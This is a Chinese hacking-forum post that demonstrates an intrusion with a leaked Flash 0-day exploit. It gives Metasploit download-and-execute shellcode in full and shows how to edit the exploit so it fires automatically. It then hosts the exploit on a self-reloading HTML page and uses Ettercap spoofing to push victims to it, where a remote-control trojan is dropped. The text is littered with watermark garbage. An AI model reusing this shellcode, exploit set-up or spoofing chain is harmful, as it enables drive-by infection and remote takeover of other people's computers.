找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1382|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

" P2 t2 J% S8 D$ H2 { 三、flash 0day之手工代码修改制作下载者实例入侵演示 @( F. ]; H* t. b* X1 g( a

1 _- b4 x* x$ s/ n. m1 ^2 v+ M

7 Z5 H# d- M1 u& `8 | 利用到的工具: $ c) n8 k9 O/ U% }8 f9 ^. W

/ D7 W1 f- Z4 c% ]

$ W/ y( ^" \6 g+ v Msf - a" H$ V3 H8 Z6 k' ~) |

5 g" v/ o/ X; z5 z" c1 h

& [/ n1 n7 R5 |( F. z Ettercap ) q$ I* i0 m& x& I+ C, B" q0 G& }: V

; t. h. Q" r/ O2 J2 S8 R1 q% S1 R

& I3 m* w) _& {& A: s- m4 b6 \- Z Adobe Flash CS6 C( n6 I; @. K6 c

" w5 J# |2 T$ r! }8 k x

5 y9 H1 u; i$ H" _; h Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 7 K& w/ v5 D E4 t

: B1 v- ?3 s% P, k7 L9 a4 ^) |

% k/ B4 ^. z. P" | 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options ) U3 W; k% Z) R7 I' S; a1 \: Z

6 n2 b6 p& V$ B& m( P& T

! L: i! b. J$ g! b9 l 如图: ) n. @( M U- w3 B5 T- L: I

$ ^3 A% S) {) f) A1 p% T

" ?# E: x! j6 [7 ?1 _# @( s   ! V8 ?! D4 z! ~ M D2 w& [3 w

# g, Q9 p+ B7 W. n8 Q; s

% B* {% y, d4 B7 n4 h   0 O9 e6 ]- ^. G. v. c4 f5 Q

$ q: a B. m; P

7 D, S/ C: l* T' ~( V! M1 U+ N 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: + W7 g5 G2 a) S# H) S/ {

& [4 e9 O) V; L# g

1 y) R& E6 S) f5 L. w8 x   # x5 X' W1 }$ v# g2 b

8 G. e8 v- @, y3 C$ H& X

" W/ |1 p, `) f5 e   0 B; U8 w, N# g3 s8 F

% D7 l8 ~& v ]5 ~) ]1 s

$ T; ?6 k2 }; a0 H7 @7 Q6 {" O 然后执行generate -t dword生成shellcode,如下: . e4 a$ d7 ~% @# A

6 w- {. V7 M3 m, S) S: t3 v

) z+ }5 |3 {- M# e! Z) m' i   * ` Y" S, [( C; S; G% g: k5 t* `3 k% m

8 K3 G; H5 j) }: M

1 f, d! I1 D! s2 K6 j' L/ m0 K 复制代码到文本下便于我们一会编辑flash exp,如下: . J3 ]6 G% T, O5 D2 g* u( p

$ Q; n: m6 c# z1 a" h& S

% K. v9 w$ \& R+ b- z: g( p% H0 x 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, + g7 K+ s: {' q; T1 f# A

, }- C) p% t3 L) L9 L. y

% y! |. v! L3 J7 `3 @ 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 0 h' a0 X' V, l

+ X5 a; V" p* X8 E- I W6 r

- w1 k/ Z+ i( ~6 J 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, / c8 b1 Q% @# [* r2 r

3 a! p6 z; `+ c' }- B* y8 Q6 g

& @3 R9 Z! p8 F/ M4 J# _$ D 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ) H/ \, l# n) `: {! p

. a4 F2 F. Y( G5 O! r0 h% ?: [! x- [

* [# t' {0 `- a% h/ T( C 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 7 {) \% ^6 [( D! W' i$ p7 H; X# r

: E' V* T& P$ I+ O a B6 k

+ s* E2 N2 H4 L$ t 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 5 O9 M3 D: k4 r- j8 P' @- a2 e" `

0 t5 d( E; Z' M7 ?

6 {( T5 \ L, T% i; H+ ^) A 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, + Q" l5 [" e( |6 Q, a1 Q

9 J) q1 @1 X: G' ?9 s

' ]4 j- ]6 @1 p; \- I 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, : K8 p t/ k2 Z {! d1 n

# q$ o6 n# a7 S. c8 P" G: B

) W- u: b8 n5 x, Z1 T 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, * B% g% o! b/ d; [# l* t- b% R

, s/ `1 W3 a E7 z6 v6 B. f6 }0 {

9 R, f: K1 {/ D6 }, v( v, c 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, . \2 o1 t+ R1 G0 }$ P

2 ~8 s4 ~( M" W- x4 n, g

1 b) a9 X1 m2 Y$ N 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 9 ^1 b8 t3 b' A/ W" r% H( n

' _) A3 X y. X. |7 H

5 m; V- Y9 e$ ~+ } 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 0 h! Q0 G% L* W4 t: \& h

/ e+ h) i8 r5 q2 }% c

+ i4 s0 U7 o& ?% e 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 6 _ }: ~4 B4 ~9 b# _: w5 W

$ m5 @- c+ P/ X; p2 a3 d/ S: l

6 E( j+ i, I: r m- F' Y- ]8 {2 O2 ? 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ! A0 t9 h" e" `

; S4 c4 _1 D9 `

5 Y5 j! J2 o& R# b+ w. U$ x2 P   + h& ]0 I4 z& m/ B) q. Z

4 l+ j k# a* ]5 f' X: N

+ r: E3 j: N+ N2 i1 P% }   _+ C3 J4 |! u F0 ?: T0 R# t

8 H( l% l* n/ |- z; a0 z' p) a c

% D E& `# z4 w4 Q( a0 k 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 7 S4 V% o5 Q8 D& z3 ~3 l7 I- Z

8 w! m* G, F% {- Q' z' `' s

7 O5 T$ w9 I. A; h: K" F   " d/ [) G) O) {' f: K% p4 D

+ y& z- ~ @; b; t

- H' ]1 d, p# G) E( Y& [ 先修改ShellWin32.as,部分源代码如图: G* I& n9 t+ f ^# ^

. T3 O9 _" r% q; @- L0 W

$ _3 L: A: Z8 {, q* u+ D   1 n( O. J8 J% D+ {+ C2 m o

% v m# x* J+ Q/ h7 t, ?% z

- P6 Q+ S9 Y5 e; k, r 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: . D0 ~ ~3 N9 O2 r. d

' r. [4 Y6 V9 C d7 `

4 ~( [9 g! f; L5 T   4 E+ j0 s4 }! \# s/ a$ B

& z) @: G" Z4 G" R4 L5 U1 x

3 K$ H; h. z/ _' V 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: % P7 I P4 K+ c) O& r; q

/ s( P9 Q) j9 q* b; \$ H$ x$ \

6 j. _& R4 |7 Z; \9 S. h! s   7 |1 z3 F/ j( y

2 A- l" w# P- R. O: l

' B6 w1 |) C, k3 Q" t# r 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: . E0 D; {: u4 A' k6 O% D6 R$ }

8 G+ h) F" K; W$ {

6 _1 l5 u& a! g/ N, `/ @' K   + a8 T' O/ v. A2 Y* }

2 c, l) }/ J2 W4 x7 S( u# c' x

9 s+ d+ c8 g/ U6 P   ( a: W2 N, r; o9 U' M. D. U' M

/ ]9 e8 m9 q0 k5 _0 ?

; w) W% C% F( m8 y. ?" Z c   ! I' ~* }0 @* P1 O- ^% o0 M

8 d) h$ P% O! R; ]' Y8 B

5 X/ j9 O4 H7 H& S: @2 e 然后点保存,下面我们来编译一下,打开 5 d o4 @; O& u

: G5 U; l0 Z4 ^! ^

+ ~& |1 P8 G3 v8 ^0 ~ exp1.fla然后点文件-发布,看看编译没错误 , h1 ^! N9 b) [- D

7 u1 h' |) B0 g: ?9 r, `* N" p

8 Z1 r y1 s1 b6 M* d. h/ w4 P, t) Q9 {   4 V3 Z% E; N6 w ]% m

# ]2 x9 z8 v7 U$ u! W4 s4 F! y: c! B

% _, b. k$ }" ?& ~# k2 F   # I0 e4 j) d* u) v9 M4 f% S- h& C R6 k

" N9 Y* l; Y2 r& h- O

, j" T: j) b9 k   ) } s1 M$ i" m2 i; I

$ D7 D# Z6 E! M6 Q5 x

" `; K7 C. V$ T1 }" C: q; C   1 d- y3 H# w* G2 Y7 R

% i5 w6 }% H, B# r4 L- a1 ?5 a

0 x& [, F n6 N6 Q: R 然后我们把生成的 7 W' g% }9 r D$ N, f

) k% {0 C4 f' d! r. E. O5 _ P

: {) E/ B1 E7 u! T0 Z3 C exp1.swf丢到kailinux /var/www/html下: ) E, K y# K. Q' K) z

; p# s. J, P6 s2 P2 B

# f O8 Q7 ^6 W! O1 M- `5 y! r$ r$ c: y 然后把这段代码好好编辑一下 $ S2 A& p2 X8 V8 g6 F5 @

% D9 I" I5 ~ n4 q4 H$ Z

8 \- b' ^! E$ j# t) b: v: E1 \   8 W( L7 }% q$ _. E0 O( p* I9 i' a; J

. N5 x1 R, v' e- m3 y

0 ^0 M% s9 ~2 y& y( S! N0 y   ( ?( H: q6 c$ a& k

1 `9 e& c1 l* O5 A s9 ]4 a- ?

+ W7 x/ ?+ J/ S   ' ~* ~$ I8 U$ T6 W

1 x( X3 C1 S% b

3 \. n8 b; L! N/ z   % z7 {* W& E: R/ c3 j2 |2 s9 j

+ `: \$ l3 z: _2 z& D5 d

/ I. O) d8 A" `! R" d- {* ?   $ z* Y. b z/ v

( @. U {$ P/ m, y; ]. H, E+ |

. }9 z0 q' W! T, ?9 t   : D! _% E! ^$ x% Y% Q; r5 [% T

0 a5 V% R- I, m6 q

8 P D) d, }) h2 ? <!DOCTYPE html> . E3 X6 {: V; M6 ?, C

, v2 _* h l0 r

' [. ~, ]3 y& w+ ] <html> ! U9 t; s( S1 O' [

( I: E# z% i+ m6 j; X3 g/ u

( E4 R% R9 [. [0 d' @0 k <head> # A; ^7 w1 i, @

" L$ S2 u( I3 C7 ~- e8 C# ~

: N$ Y* `! T! P) F* I' p <meta http-equiv="Content-Type" content="text/html; # I3 E4 y6 @3 M( p8 \5 c0 H3 R

: P/ Z8 ?, {6 Y, p4 A( C

; j$ a" ?# Q4 V- |. W# L4 T) R charset=utf-8"/> " D z+ X. X2 Z- F

* D' N4 I* u# P- S6 ^

7 x, A1 J( A2 ]6 B </head> / ^- L- x* d9 p% J

) R6 ?5 {8 Q/ m0 Y

; h/ Y& d* ?# ]" O+ H/ I6 l <body> 7 g& i7 I8 I7 y) M* a( v5 d1 g

$ E: i) y K7 ?5 }" {9 a' n

' q3 K: T; D: Z: a <h2> Please wait, the requested page is loading...</h2> + z2 ?' I/ J# n4 i( y0 w

5 q# B; K; z0 f- U- `+ U4 I

7 e+ a7 X2 h3 _+ F1 v <br> 2 C7 h5 p! |( _/ L+ k7 z' a _& Y

4 p7 R* |3 j' Q$ O: _0 Y

* l' ~9 ?3 G/ N/ j/ p8 j <OBJECT ) X; b) d9 h8 l+ @

7 v/ s3 ?) n/ Q4 j( Q& h! K% F

X8 o/ u9 j0 p& K: P- Z# s7 U classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie . o. J) U' q6 z& Q5 C

( N* R8 O! O: B8 A- [

6 e: W- g- O2 G! | VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ) [# y% ^6 J/ S' h& {, S

! M/ B5 b! Q0 c+ i8 h, ^& {

( f1 d9 L3 L% d w! {: y </body> * @+ { \" C/ z

; V! b z( e& @2 G8 {; f+ i9 Z

5 E7 m, L5 {9 T" ~8 t <script> # e" ]" q9 U% I9 y; V

" h* U4 f. q$ M7 P4 ] F" S; B

3 ~5 F% ]; ]. ] V     setTimeout(function () { 9 F. y: {+ o1 [+ X5 L' d

6 I" I6 Q4 {' W

' A8 n) s `+ K& o- K U          9 T# T6 N: }2 ~: g7 p# }) W- }

, z. R5 J; D) p7 P& ?

, k6 X7 p4 ]& [, n: S window.location.reload(); : f1 q( u- X# G$ y( G6 N

# C6 |# U7 f( |: r) m7 Q

# y. Z$ c/ [0 V ], E     }, 10000); ' }# X/ R1 O; ]0 {: ?9 S

# |$ B5 _0 G/ s

, S8 s" Z# E- o& [. C8 U7 _   5 J6 ~. M: Q2 S3 Q# E/ p' i' R* R

`) |+ b: o: w7 `. }( T! c8 p$ W

" E2 [, n K+ `1 e1 m </script> 4 h6 Y9 Y/ N6 n. D# t

3 Y; h4 P" M6 C0 y9 R1 }. Z

4 J" z8 x* E0 P4 h$ U- _* j5 R; m </html> 4 c7 W9 L8 ]1 w/ l7 a+ r1 u# ^

& ~- N4 {7 v' \, h* [0 U

3 W. q! R1 d( ?0 [   6 A, h; e0 @, b4 s! R5 I A7 d

( ^6 ^: V2 b& D' q d& D

0 w$ a x. J7 Q |1 @ 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ( v0 ^1 A) S' U+ H1 U9 e

4 {+ E9 Y& g) s$ _% K

9 \. W0 Y5 ~( n( K/ q   6 r. P5 j: z- h. J' N4 R$ N! p7 @

: ~2 b& H0 f, [

; ]# r; V6 `3 U# o6 @   2 E1 a. w" ^+ A

/ A! Y- ]1 m1 V q9 L- z

# u8 x6 }' i, l/ N" `   5 U1 c( d8 k$ _6 Z9 c# P

' @" Q- n4 M F S! E

1 e( n+ w' {8 m# ?8 N. K8 ^   4 n+ s# S8 t! r. z2 f8 D

0 N; E, ?: I! c. D+ B: ]3 S

; W6 h7 j s& E9 y! s7 Y* }   ; Z4 ]: B6 z! s! `! K2 p

% m& f& z$ M/ w* Z

5 J* ?/ S- e% S, X& q0 E! W 下面我们用ettercap欺骗如图: ! c) W. P: d* S1 e3 i5 I

2 q7 x( M6 l+ S; r, v

" H# ? M& F: [7 f' D) }" ^/ B   : O Y/ @* \: P, V& I

; j/ |% ?0 X5 p" C+ V" ^1 X+ r

" v' H% `0 V9 V7 G( r   9 Y/ i/ o# z7 z( u3 Q

9 Q ?# W/ @; H$ z1 j9 Z

0 p( b5 \8 V1 G 下面我们随便访问个网站看看: 0 U. U: _( C- ~" o8 V k

+ |$ Y' E7 u1 {, m' X

, h# |0 M5 L) K1 R" I* V 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: : N$ k) ^$ T5 d3 L: c7 M G) k6 W

* `" n* U5 V, }3 r8 Q

) w! {; ^4 b5 C$ ~; X3 q5 n! _   8 N W7 P* Y9 w7 l

/ r {1 T0 g% l

' E, L% w3 }* j$ e" p# J9 a0 {) n 我们看另一台, ' }* G/ O1 K- o0 Z

# y7 a9 q+ o m# w! V0 i' q3 l3 U

2 P# p# J4 A7 N6 m 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 ! ~0 H c0 Y* l4 `& I7 x0 ?

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表